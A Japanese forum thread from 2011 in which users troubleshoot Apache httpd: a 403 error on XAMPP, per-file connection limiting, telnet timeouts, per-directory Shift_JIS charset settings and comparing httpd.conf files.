たくさんあってどれを挙げればいいかわからないんですがこんな感じのがありました。

[Fri Sep 30 00:12:17 2011] [notice] Child 7976: Starting thread to listen on port 8080.
[Fri Sep 30 00:12:38 2011] [error] [client 127.0.0.1] client denied by server configuration: C:/xampp/Apache/htdocs/
[Fri Sep 30 00:13:50 2011] [notice] Parent: Received restart signal -- Restarting the server.
[Fri Sep 30 00:13:50 2011] [notice] Child 7976: Exit event signaled. Child process is ending.
httpd.exe: Could not reliably determine the server's fully qualified domain name, using 192.168.1.2 for ServerName

それとWindowsファイアウォールを今調べているところです。
643 :名無しさん@お腹いっぱい。2011/09/29(木) 23:05:06.03
やりたいことを正しく表現できないお馬鹿さんであり
充実したドキュメントがあっても理解できないお馬鹿さんでもあるという
そんなかんじ?
650 :名無しさん@お腹いっぱい。2011/09/30(金) 00:41:01.39
エラーログを削除して真っさらにしてやってみました。

[Fri Sep 30 00:38:36 2011] [notice] Parent: Received restart signal -- Restarting the server.
[Fri Sep 30 00:38:36 2011] [notice] Child 6636: Exit event signaled. Child process is ending.
[Fri Sep 30 00:38:36 2011] [notice] Apache/2.2.21 (Win32) configured -- resuming normal operations
[Fri Sep 30 00:38:36 2011] [notice] Server built: Sep 9 2011 10:26:10
[Fri Sep 30 00:38:36 2011] [notice] Parent: Created child process 4464
[Fri Sep 30 00:38:37 2011] [notice] Child 4464: Child process is running
[Fri Sep 30 00:38:37 2011] [notice] Child 4464: Acquired the start mutex.
[Fri Sep 30 00:38:37 2011] [notice] Child 6636: Released the start mutex
[Fri Sep 30 00:38:37 2011] [notice] Child 4464: Starting 64 worker threads.
[Fri Sep 30 00:38:37 2011] [notice] Child 4464: Starting thread to listen on port 8080.
[Fri Sep 30 00:38:45 2011] [notice] Child 6636: All worker threads have exited.
[Fri Sep 30 00:38:45 2011] [notice] Child 6636: Child process is exiting
[Fri Sep 30 00:39:02 2011] [error] [client 127.0.0.1] client denied by server configuration: C:/xampp/Apache/htdocs/
651 :名無しさん@お腹いっぱい。2011/09/30(金) 00:45:16.71
>>650
そこに 403 の原因が書いてるではないか。
652 :6362011/09/30(金) 01:11:25.26
今日はもう無理なので寝ます。
いろいろググってみたので明日やってみます。
ヒントを下さってありがとうございました。
657 :名無しさん@お腹いっぱい。2011/10/01(土) 11:17:49.27
接続数制限とかだと最近じゃmod_vlimitというやつが結構良いが使ってる人いる?
ファイル単位で接続数制限かけたいと思ってる
658 :名無しさん@お腹いっぱい。2011/10/09(日) 17:03:05.04
>>657
しらね。
それ系のは、mod_statusのスコアボード見て各プロセスやスレッドが
その瞬間に処理してるURLの中から単純にマッチするものを
カウントしてるだけだから、動作的にはほとんど問題ないかと。

注意すべき点としては、MaxClientsみたいな同時アクセス数の数値を
あまり大きくしている場合は、カウントしなければならない対象も
かなりの数になるんで、オーバーヘッドが高くなる(かも)ってことぐらいかな?

関係ないが、今度はまたmod_proxyにセキュリティホールかw
660 :名無しさん@お腹いっぱい。2011/10/16(日) 14:13:43.19
>>658
ファイル単位で同時接続数見るのはスコアボードじゃできないよ
669 :名無しさん@お腹いっぱい。2011/10/21(金) 11:18:08.93
>>660
あれ?そうだっけ?
Extend何とかの設定入れたら取れたと思ったが… 記憶違いかな。
ってか、スコアボードで取れないとしたら他にどんな実装があるっけ?
モジュール自前で共有メモリに書き出して管理するぐらいだろうか。
676 :名無しさん@お腹いっぱい。2011/10/22(土) 16:15:19.35
>>669
スコアボードにr->filenameは保存されない。
なので、ファイル単位で同時接続数調べようと思ったら子プロセス同士でプロセス間通信しないとだめ。
677 :名無しさん@お腹いっぱい。2011/10/22(土) 16:17:07.10
そういう意味では>>657は良くできてる
661 :名無しさん@お腹いっぱい。2011/10/18(火) 07:36:25.84
nginxスレってないの?
663 :名無しさん@お腹いっぱい。2011/10/18(火) 16:28:25.06
>>661
立てろ
665 :名無しさん@お腹いっぱい。2011/10/19(水) 11:39:18.13
Apacheも最初は読み方が分からなかったが
nginxも相当ぶっとんでるな。
666 :名無しさん@お腹いっぱい。2011/10/19(水) 12:37:28.55
>>665
「にんじんx」?
667 :名無しさん@お腹いっぱい。2011/10/19(水) 13:10:55.14
>>666
惜しい!
670 :名無しさん@お腹いっぱい。2011/10/22(土) 11:04:10.65
Connection closed by foreign host.
telnetして数秒たつとこうなるんだけど
これ無効にしたり、時間伸ばしたりできないの?
教えてください
674 :名無しさん@お腹いっぱい。2011/10/22(土) 13:41:49.24
>>670
なんでそんなことしたいの。
672 :名無しさん@お腹いっぱい。2011/10/22(土) 11:43:47.08
教えてください
apacheにtelnetし接続して8秒ほどたつと
Connection closed by foreign host.
と出ます教えてください
675 :名無しさん@お腹いっぱい。2011/10/22(土) 14:09:58.39
デフォルト設定のままインターネットに公開はキツいからなぁ
パフォーマンスチューニング系の話題は良い感じに纏めてる先人が多数いらっしゃるから

ググれカス
678 :名無しさん@お腹いっぱい。2011/10/22(土) 16:42:08.96
わからねーのかよ使えねーなクソ
679 :名無しさん@お腹いっぱい。2011/10/22(土) 17:43:43.89
>>678
tcpのセッションの話とapacheのタイムアウトは別物。
681 :名無しさん@お腹いっぱい。2011/10/23(日) 10:39:49.42
先日サーバをレンタルしたのですが
ページ自体が自分の期待する文字コードでファイルを返してくれません。

具体的には、 hoge.html というhtmlページは shift-jis で記述しており
shift-jisで閲覧される事を想定しているのですが、utf-8としてコンテンツが吐き出されている様です。


たとえば、 下記の様な特定のディレクトリにあるファイルのみ(←重要★)
文字コードを変更するにはどうすればよいでしょうか?
hoge_dir/hoge/
hoge_1.html
hoge_2.html
682 :名無しさん@お腹いっぱい。2011/10/23(日) 12:09:59.37
<Directory ...>
AddDefaultCharset ...
</Directory>
683 :名無しさん@お腹いっぱい。2011/10/23(日) 12:59:36.51
>>682
次の2パターンを試してもやはり駄目でした。どこに問題があるのでしょうか?

hoge_dir/hoge/
 .htaccess
 hoge_1.html
 hoge_2.html

【.htaccessの設定】
その?
<Directory .>
AddDefaultCharset Shift_JIS
</Directory>

その?
AddType "text/html; charset=Shift_JIS" sjis
684 :名無しさん@お腹いっぱい。2011/10/23(日) 13:13:27.27
><Directory .>

アホか。よく考えろ。
685 :名無しさん@お腹いっぱい。2011/10/23(日) 13:18:15.60
>>684

そもそも <Directory>はhttpd.cnf とかにしか指定出来ないのではないでしょうか?

うーん文字化けしてしまう。
html ⇒ php にして文字コードを指定すれば文字化けしないんですけど・・・
687 :名無しさん@お腹いっぱい。2011/10/24(月) 02:40:40.53
AddType "text/html; charset=Shift_JIS" html
とかじゃないの

そのhtmlをUTF-8にするのはだめなん?
688 :名無しさん@お腹いっぱい。2011/10/24(月) 14:17:58.37
>>687
AddCharsetというディレクティブもあることも知らずに回答者気取りとかww
690 :名無しさん@お腹いっぱい。2011/10/25(火) 05:37:52.42
デフォルトチャーセットってノンに出来ないっけ?
こんなの設定してる鯖屋は萎えるな。
695 :名無しさん@お腹いっぱい。2011/10/26(水) 14:24:34.91
>>690
AddDefaultCharset noneって見ただけで笑えるよねw
noneって設定値はcharset=noneの設定だからw
691 :名無しさん@お腹いっぱい。2011/10/26(水) 05:19:30.01
二つのhttpd.confを比較して、
設定の差分をリストアップするようなソフトがあればおしえてください
692 :名無しさん@お腹いっぱい。2011/10/26(水) 05:27:59.24
693 :名無しさん@お腹いっぱい。2011/10/26(水) 08:28:10.87
>>691
diffコマンド
694 :名無しさん@お腹いっぱい。2011/10/26(水) 10:31:02.56
>>693
ちゃんと-uつけろよ?

マイクロソフト ワイヤレス ブルートラック マウス Arc Touch Mouse RVF-00006
マイクロソフト ワイヤレス ブルートラック マウス Arc Touch Mouse RVF-00006